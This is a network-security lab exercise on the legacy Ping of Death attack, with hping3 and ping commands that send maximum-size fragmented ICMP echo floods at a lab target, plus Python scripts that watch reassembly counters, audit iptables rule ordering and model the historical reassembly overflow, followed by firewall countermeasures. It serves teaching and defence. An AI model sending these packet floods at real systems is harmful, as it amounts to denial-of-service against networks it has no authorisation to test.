Exercise 61: Conducting a Ping of Death Attack

Published Jul 25, 2025

Objective

Simulate a Ping of Death (PoD) attack to understand how an ICMP echo request whose fragments reassemble to more than 65,535 bytes, the largest datagram IPv4 can describe, once crashed the IP stacks that tried to reassemble it. Learn how to monitor the target while the packets are in flight, implement countermeasures, and see why modern systems are no longer vulnerable.


Scenario

The Ping of Death is a denial-of-service (DoS) attack in which an attacker sends an ICMP echo request that is fragmented so that the reassembled datagram exceeds the 65,535-byte IPv4 maximum. Vulnerable stacks of the mid-1990s copied each fragment into a fixed-size reassembly buffer without checking that offset plus length stayed inside it, so the last fragments overwrote adjacent kernel memory and the target crashed, froze, or rebooted. Operating systems have checked this bound since the late 1990s, so the commands in this exercise can at most stress the reassembly path with maximum-size datagrams. The exercise demonstrates the mechanism and how to mitigate it at the host firewall.

⚠️ Important: Perform this exercise in a controlled environment. Do not target unauthorized systems. Unauthorized network attacks are illegal and unethical.


Lab Instructions

Step 1: Prepare the Testing Environment

a. Set Up Target and Attacker Machines

  • Target Machine: Linux/Windows VM (an unpatched or legacy system if you want to see the historical impact; a current OS will simply absorb the packets).
  • Attacker Machine: Kali Linux or any Linux distribution with hping3 installed.
  • Put both VMs on an isolated host-only network so the fragments never reach anything else.

b. Install hping3 on the Attacker Machine

sudo apt update
sudo apt install hping3 -y

Step 2: Conduct the Ping of Death Attack

a. Send Oversized ICMP Packets with hping3

sudo hping3 -1 -c 1000 -d 65500 <target-ip>
  • Explanation:
    • -1: ICMP mode (echo request).
    • -c 1000: Send 1,000 packets.
    • -d 65500: Set the ICMP data size to 65,500 bytes. With the 8-byte ICMP header and 20-byte IP header the datagram is 65,528 bytes, just under the 65,535-byte limit, so on a 1,500-byte MTU link it travels as 45 fragments of up to 1,480 bytes. This is the largest datagram a correct stack will build: it exercises the target's reassembly path but is not itself oversized.
  • Note: if hping3 refuses to send with a "Message too long" error, add -f so that hping3 splits the datagram into fragments itself instead of handing one large packet to the kernel.

b. Alternative Method Using ping (if supported)

ping -s 65507 <target-ip>
  • Note: 65,507 is the largest data size ping accepts, because 65,507 + 8 (ICMP header) + 20 (IP header) = 65,535. Larger values are refused by ping and by the kernel, so ping can only send a maximum-size datagram, never an oversized one. On the wire it is fragmented exactly as with hping3.

c. Monitor Target Machine Behavior

  • From a third host (or the attacker) check whether the target still answers normal pings and SSH; on the target itself watch CPU and memory in top.
  • The Linux kernel does not log reassembly drops by default, so dmesg usually shows nothing for this test; still grep it for ICMP-related messages and read its tail for kernel warnings:
dmesg | grep -i icmp
  • The reassembly counters on the Ip: line of /proc/net/snmp (ReasmReqds, ReasmOKs, ReasmFails) tell you whether the fragments arrived and whether the target reassembled them.
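A way to watch the target's reassembly and ICMP counters while the packets arrive, added here as an example that is not part of the original exercise. It reads /proc/net/snmp on the Linux target, where the kernel keeps cumulative counters, samples it twice and reports how much each watched counter grew. The embedded before/after snapshots are constructed (real field names, invented numbers) so the parsing can be checked without sending anything; the wording in summarize() is a heuristic reading of the deltas, not a kernel contract.

```python
import sys
import time
from pathlib import Path

SNMP_PATH = Path("/proc/net/snmp")

# Cumulative-since-boot counters worth watching while the packets are in flight;
# the script reports how much each one grew between two snapshots.
WATCH = {
    "Ip": ["InReceives", "InHdrErrors", "InDiscards", "InDelivers",
           "ReasmReqds", "ReasmOKs", "ReasmFails", "ReasmTimeout"],
    "Icmp": ["InMsgs", "InErrors", "InCsumErrors", "InEchos", "OutEchoReps"],
}

# Constructed snapshots in the layout the kernel uses: for each protocol a line of
# field names followed by a line of values. Field names are the real ones; the
# numbers are invented (100 maximum-size pings of 45 fragments each, all of them
# reassembled and answered by a patched host).
SAMPLE_BEFORE = """\
Ip: Forwarding DefaultTTL InReceives InHdrErrors InAddrErrors ForwDatagrams InUnknownProtos InDiscards InDelivers OutRequests OutDiscards OutNoRoutes ReasmTimeout ReasmReqds ReasmOKs ReasmFails FragOKs FragFails FragCreates
Ip: 1 64 120000 0 0 0 0 0 119900 98000 0 0 0 90 2 0 0 0 0
Icmp: InMsgs InErrors InCsumErrors InDestUnreachs InTimeExcds InParmProbs InSrcQuenchs InRedirects InEchos InEchoReps InTimestamps InTimestampReps InAddrMasks InAddrMaskReps OutMsgs OutErrors OutDestUnreachs OutTimeExcds OutParmProbs OutSrcQuenchs OutRedirects OutEchos OutEchoReps OutTimestamps OutTimestampReps OutAddrMasks OutAddrMaskReps
Icmp: 40 0 0 5 0 0 0 0 30 5 0 0 0 0 35 0 5 0 0 0 0 0 30 0 0 0 0
"""
SAMPLE_AFTER = """\
Ip: Forwarding DefaultTTL InReceives InHdrErrors InAddrErrors ForwDatagrams InUnknownProtos InDiscards InDelivers OutRequests OutDiscards OutNoRoutes ReasmTimeout ReasmReqds ReasmOKs ReasmFails FragOKs FragFails FragCreates
Ip: 1 64 124500 0 0 0 0 0 120000 98100 0 0 0 4590 102 0 0 0 0
Icmp: InMsgs InErrors InCsumErrors InDestUnreachs InTimeExcds InParmProbs InSrcQuenchs InRedirects InEchos InEchoReps InTimestamps InTimestampReps InAddrMasks InAddrMaskReps OutMsgs OutErrors OutDestUnreachs OutTimeExcds OutParmProbs OutSrcQuenchs OutRedirects OutEchos OutEchoReps OutTimestamps OutTimestampReps OutAddrMasks OutAddrMaskReps
Icmp: 140 0 0 5 0 0 0 0 130 5 0 0 0 0 135 0 5 0 0 0 0 0 130 0 0 0 0
"""


def parse_snmp(text):
    """Turn the header/value line pairs into {"Ip": {"InReceives": 120000, ...}, ...}."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    stats = {}
    for header, values in zip(lines[0::2], lines[1::2]):
        proto, names = header.split(":", 1)
        _, numbers = values.split(":", 1)
        stats[proto.strip()] = dict(zip(names.split(), map(int, numbers.split())))
    return stats


def snapshot(path=SNMP_PATH):
    """Live snapshot of the local kernel's counters (Linux only)."""
    return parse_snmp(path.read_text())


def delta(before, after, watch=WATCH):
    """Growth of each watched counter between two snapshots."""
    out = {}
    for proto, fields in watch.items():
        b, a = before.get(proto, {}), after.get(proto, {})
        out[proto] = {f: a[f] - b.get(f, 0) for f in fields if f in a}
    return out


def summarize(d):
    """Plain-language reading of the deltas. Heuristic: counters alone do not prove
    a crash, but they do show whether fragments arrived and were reassembled."""
    ip, icmp = d.get("Ip", {}), d.get("Icmp", {})
    notes = []
    if ip.get("ReasmReqds", 0) and not ip.get("ReasmOKs", 0):
        notes.append("fragments arrived but no datagram completed reassembly "
                     "(discarded, filtered, or timed out)")
    if ip.get("ReasmOKs", 0):
        notes.append(f"{ip['ReasmOKs']} datagrams reassembled from "
                     f"{ip.get('ReasmReqds', 0)} fragments: the stack handled them")
    if ip.get("ReasmFails", 0) or ip.get("ReasmTimeout", 0):
        notes.append("reassembly failures or timeouts were recorded")
    if icmp.get("InEchos", 0) and not icmp.get("OutEchoReps", 0):
        notes.append("echo requests reached ICMP but no replies went out "
                     "(filtered or rate-limited)")
    if ip.get("InReceives", 0) and not ip.get("InDelivers", 0):
        notes.append("packets were received but none were delivered up the stack "
                     "(a filter rule or reassembly discarded them)")
    return notes


if __name__ == "__main__":
    # Usage on the target: python3 watch_reasm.py [seconds]; start it, then launch the pings.
    interval = float(sys.argv[1]) if len(sys.argv) > 1 else 5.0
    first = snapshot()
    time.sleep(interval)
    d = delta(first, snapshot())
    for proto, fields in d.items():
        print(proto, " ".join(f"{k}=+{v}" for k, v in fields.items()))
    for note in summarize(d):
        print(" -", note)
```

The script needs no privileges because /proc/net/snmp is world-readable; run it on the target for a window that covers the hping3 run, and compare ReasmReqds (fragments seen) with ReasmOKs (datagrams completed) to see what the stack did with them.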

Step 3: Implement Countermeasures

a. Block ICMP Echo Requests Using iptables (Linux)

sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
  • This drops every echo request, so the host stops answering ping altogether. Other ICMP types, which IP needs for error reporting and path MTU discovery, still pass.

b. Limit ICMP Packet Size Instead

sudo iptables -A INPUT -p icmp --icmp-type echo-request -m length --length 0:128 -j ACCEPT
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
  • Use either a. or b., not both: iptables evaluates a chain in order and stops at the first rule with a terminating target, so if the DROP from a. is already in the chain, the ACCEPT in b. is never reached and small pings are dropped too. List the chain (Step 4b) before appending rules.
  • The length match is applied to each IP packet the filter sees. If connection tracking is loaded (any -m conntrack or -m state rule pulls it in), fragments are reassembled before the filter table and the whole datagram is measured; without it, only the first fragment carries the ICMP header and matches --icmp-type.
  • These rules cover IPv4 only; ICMPv6 echo requests need matching ip6tables rules.

c. Enable the Firewall on Windows

  • Go to Control Panel > System and Security > Windows Defender Firewall > Advanced settings.
  • Under Inbound Rules, disable or set to Block the predefined echo-request rule (on current releases it is named "File and Printer Sharing (Echo Request - ICMPv4-In)") so that incoming ICMP Echo Requests are refused.

d. Persist the Rules

  • Rules added with iptables -A take effect immediately; no service restart is needed for the test.
  • Only run the command below after saving the rules (see the script at the end of this page): on RHEL-family systems the iptables unit (from the iptables-services package) reloads the rule set from its saved file on restart and discards anything not saved; on Debian and Kali there is no iptables unit at all and persistence is handled by iptables-persistent.
sudo systemctl restart iptables

Step 4: Test the Effectiveness of Countermeasures

a. Re-run the PoD Attack

sudo hping3 -1 -c 1000 -d 65500 <target-ip>
  • Expected Result: The attack is blocked, and the system remains stable.

b. Verify Firewall Rules

sudo iptables -L -v -n
  • Expected Result: the DROP rule for icmptype 8 is listed and its pkts and bytes counters grow while the attack runs, showing that the echo requests are being filtered.
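iptables evaluates a chain in order and stops at the first rule with a terminating target, so appending the size-limiting ACCEPT of Step 3b after the blanket DROP of Step 3a leaves the ACCEPT unreachable and small pings dropped. The following is an added example, not part of the original exercise: it parses an `iptables -S INPUT` listing, simulates the first-match walk for a given packet, and reports rules that no packet can ever reach. The embedded listing is a constructed sample of what the chain looks like if both Step 3a and Step 3b are applied in the order given (iptables -S prints echo-request as its numeric type 8). Only the -p, --icmp-type, --length and -j options are understood, and packets are modelled as whole datagrams, not fragment by fragment.

```python
import sys
import shlex
from pathlib import Path

# Constructed sample of `sudo iptables -S INPUT` after Step 3a and Step 3b were
# both applied in the order the exercise lists them.
SAMPLE_RULES = """\
-P INPUT ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j DROP
-A INPUT -p icmp -m icmp --icmp-type 8 -m length --length 0:128 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j DROP
"""

TERMINATING = {"ACCEPT", "DROP", "REJECT"}
MAX_LEN = 65535


def parse_rules(text):
    """Reduce `iptables -S` output to the chain policy and, per -A rule, the few
    matches this audit understands: protocol, ICMP type, length range, target."""
    policy, rules = "ACCEPT", []
    for line in text.splitlines():
        tok = shlex.split(line)
        if not tok:
            continue
        if tok[0] == "-P":
            policy = tok[2]
            continue
        if tok[0] != "-A":
            continue
        rule = {"proto": None, "icmp_type": None, "length": None, "target": None, "raw": line}
        for i, t in enumerate(tok[:-1]):
            val = tok[i + 1]
            if t == "-p":
                rule["proto"] = val
            elif t == "--icmp-type":
                rule["icmp_type"] = {"echo-request": "8"}.get(val, val)
            elif t == "--length":            # forms: "lo:hi", "lo:", ":hi" or a single "n"
                lo, sep, hi = val.partition(":")
                rule["length"] = (int(lo or 0), int(hi or MAX_LEN)) if sep else (int(val), int(val))
            elif t == "-j":
                rule["target"] = val
        rules.append(rule)
    return policy, rules


def matches(rule, pkt):
    """Does the rule match a packet given as {'proto', 'icmp_type', 'length'}?"""
    if rule["proto"] and rule["proto"] != pkt["proto"]:
        return False
    if rule["icmp_type"] and rule["icmp_type"] != pkt.get("icmp_type"):
        return False
    if rule["length"] and not rule["length"][0] <= pkt["length"] <= rule["length"][1]:
        return False
    return True


def verdict(policy, rules, pkt):
    """First-match walk: the first matching rule with a terminating target decides,
    otherwise the chain policy applies. Returns (target, rule index or None)."""
    for idx, rule in enumerate(rules):
        if rule["target"] in TERMINATING and matches(rule, pkt):
            return rule["target"], idx
    return policy, None


def shadowed(policy, rules):
    """Indices of ICMP rules no packet can reach because an earlier terminating
    rule already catches everything they match. Each rule is probed with packets
    at both ends of its own length range."""
    dead = []
    for idx, rule in enumerate(rules):
        if rule["proto"] != "icmp":
            continue
        lo, hi = rule["length"] or (0, MAX_LEN)
        probes = [{"proto": "icmp", "icmp_type": rule["icmp_type"] or "other", "length": n}
                  for n in (lo, hi)]
        if all(verdict(policy, rules, p)[1] != idx for p in probes):
            dead.append(idx)
    return dead


def audit(text):
    """Raw lines of the shadowed rules, ready to print as findings."""
    policy, rules = parse_rules(text)
    return [rules[i]["raw"] for i in shadowed(policy, rules)]


if __name__ == "__main__":
    # Usage: sudo iptables -S INPUT > rules.txt && python3 audit_rules.py rules.txt
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_RULES
    policy, rules = parse_rules(text)
    for size in (64, 1500):
        pkt = {"proto": "icmp", "icmp_type": "8", "length": size}
        print(f"{size}-byte echo request ->", verdict(policy, rules, pkt))
    for line in audit(text):
        print("unreachable rule:", line)
```

On the constructed sample both the 64-byte and the 1,500-byte echo request hit the first DROP, and the ACCEPT for small pings is reported as unreachable; delete the first DROP (or insert the ACCEPT with -I instead of -A) and the audit comes back clean.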

Step 5: Discuss Modern Protections Against PoD

  1. OS-Level Protections:
    • Modern operating systems check that a fragment's offset plus length cannot exceed 65,535 bytes before copying it into the reassembly buffer, and discard the whole fragment queue otherwise.
  2. Firewall and IDS/IPS:
    • Network devices drop malformed packets.
  3. Input Validation:
    • Network stacks validate packet sizes and content.
  4. Regular Patching:
    • Timely OS and firmware updates mitigate vulnerabilities.

Solution & Explanation

How Ping of Death Works

  • Exploits a bug in IPv4 fragment reassembly: an echo request is split into fragments whose offset plus length add up to more than 65,535 bytes, the most the 16-bit total-length field can describe.
  • Vulnerable stacks copied the fragments into a fixed-size buffer without checking that bound, so the final fragments overflowed the buffer into adjacent kernel memory, leading to system instability or crashes.
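How the overflow arises and what the fix checks, shown as an added example that is not part of the original exercise. The Python below models IPv4 fragmentation of an ICMP echo request and two reassemblers: one with the historical missing bound check and one with the check modern stacks perform. The ICMP checksum and the 8-byte fragment-offset granularity follow the RFCs; the 1,500-byte MTU, the all-zero payload and the 4 KiB marker region standing in for whatever kernel memory follows the buffer are assumptions made for the demonstration.

```python
import struct

MAX_DATAGRAM = 65535                      # IPv4 total length is a 16-bit field
IP_HDR = 20                               # IPv4 header without options
ICMP_HDR = 8                              # ICMP echo header
MAX_IP_PAYLOAD = MAX_DATAGRAM - IP_HDR    # 65,515 bytes of ICMP header + data
MTU = 1500                                # assumed Ethernet MTU on the sending host
FRAG_CHUNK = (MTU - IP_HDR) // 8 * 8      # 1,480 bytes of data per fragment, multiple of 8


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(payload_len: int, ident: int = 0x1234, seq: int = 1) -> bytes:
    """ICMP echo request (type 8) carrying payload_len bytes of constructed zero data."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    payload = bytes(payload_len)
    csum = icmp_checksum(hdr + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def icmp_valid(msg: bytes) -> bool:
    """A message whose checksum field is correct sums to zero."""
    return icmp_checksum(msg) == 0


def fragment(ip_payload: bytes):
    """Split an IP payload into (offset, more_fragments, data) tuples the way the
    sending stack does. The offset travels in the IP header in 8-byte units, so
    every fragment but the last carries a multiple of 8 bytes."""
    frags = []
    for off in range(0, len(ip_payload), FRAG_CHUNK):
        data = ip_payload[off:off + FRAG_CHUNK]
        frags.append((off, off + FRAG_CHUNK < len(ip_payload), data))
    return frags


def reassemble_vulnerable(frags) -> bool:
    """Model of the 1996 bug: a fixed reassembly buffer and no check that
    offset + len stays inside it. Returns True if bytes landed past the buffer,
    i.e. in whatever memory follows it (here a 4 KiB region filled with 0xAA)."""
    marker = b"\xaa" * 4096
    mem = bytearray(MAX_IP_PAYLOAD) + bytearray(marker)
    for off, _more, data in frags:
        mem[off:off + len(data)] = data            # unchecked copy at the fragment offset
    return bytes(mem[MAX_IP_PAYLOAD:]) != marker


def reassemble_hardened(frags):
    """Patched behaviour: refuse any fragment whose end would exceed the largest
    representable datagram, and verify the ICMP checksum once complete.
    Returns the ICMP message, or None when the fragment train is rejected."""
    buf = bytearray(MAX_IP_PAYLOAD)
    total = None
    for off, more, data in frags:
        end = off + len(data)
        if end > MAX_IP_PAYLOAD:
            return None                            # oversized: drop the whole queue
        buf[off:end] = data
        if not more:
            total = end
    if total is None:
        return None                                # last fragment never arrived
    msg = bytes(buf[:total])
    return msg if icmp_valid(msg) else None


if __name__ == "__main__":
    # 65,507 is what `ping -s 65507` sends; 65,510 is the classic oversized value.
    for data_len in (65507, 65510):
        frags = fragment(build_echo(data_len))
        print(f"{data_len}-byte payload -> IP total {IP_HDR + ICMP_HDR + data_len}, "
              f"{len(frags)} fragments, overflow={reassemble_vulnerable(frags)}, "
              f"hardened={'accepted' if reassemble_hardened(frags) else 'dropped'}")
```

The 65,507-byte payload is the boundary case from Step 2b: it fills the buffer exactly and both reassemblers accept it. Three more bytes push the last fragment past the end of the buffer; the vulnerable model overwrites the marker region, while the hardened one rejects the queue at the offending fragment without copying anything.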

Why It Was Dangerous

  • Buffer Overflow: Overwrites system memory.
  • DoS Impact: Renders the target unresponsive.
  • Remote Exploitability: Required no authentication.

Mitigation Techniques

  1. Firewall Rules: Block or limit ICMP traffic.
  2. System Updates: Patch OS and firmware.
  3. Input Validation: Validate packet sizes at the network stack.

Testing & Verification

  1. Before Mitigation:
    • Target is vulnerable to oversized ICMP packets.
    • System may slow down, crash, or reboot.
  2. After Mitigation:
    • Firewall blocks oversized ICMP packets.
    • System remains stable.

Verify Firewall Rules

sudo iptables -L -v -n

System Stability Check

  • Monitor CPU and memory usage:
top
  • Check system logs:
dmesg | grep -i icmp

Security Best Practices

  1. Apply Regular OS and Firmware Updates.
  2. Use Firewalls to Block or Limit ICMP Traffic.
  3. Deploy IDS/IPS to Detect and Prevent Malformed Packets.
  4. Enable Input Validation in Network Stacks.
  5. Monitor Network Traffic for Anomalies.

Additional Script (Optional)

Automate ICMP Blocking:

#!/bin/bash
# Block ICMP Echo Requests and persist the rule across reboots.
# Saving to /etc/iptables/rules.v4 requires the iptables-persistent package on Debian/Kali.
set -e
# Add the rule only if it is not already present, so repeated runs do not duplicate it.
iptables -C INPUT -p icmp --icmp-type echo-request -j DROP 2>/dev/null \
    || iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
if [ -d /etc/iptables ]; then
    iptables-save > /etc/iptables/rules.v4
    echo "ICMP Echo Requests are now blocked; rule saved to /etc/iptables/rules.v4."
else
    echo "ICMP Echo Requests are now blocked (rule is live but not saved: /etc/iptables is missing)." >&2
fi

Run the script:

chmod +x block_icmp.sh
sudo ./block_icmp.sh

Conclusion

In this exercise, you simulated a Ping of Death (PoD) attack using hping3 to send maximum-size fragmented ICMP packets, observed how the target handled them, and implemented countermeasures at the host firewall. Regular patching, correctly ordered firewall rules, and the bounds checks built into modern IP stacks are what defend against this legacy attack and against similar malformed-packet attacks that follow it.
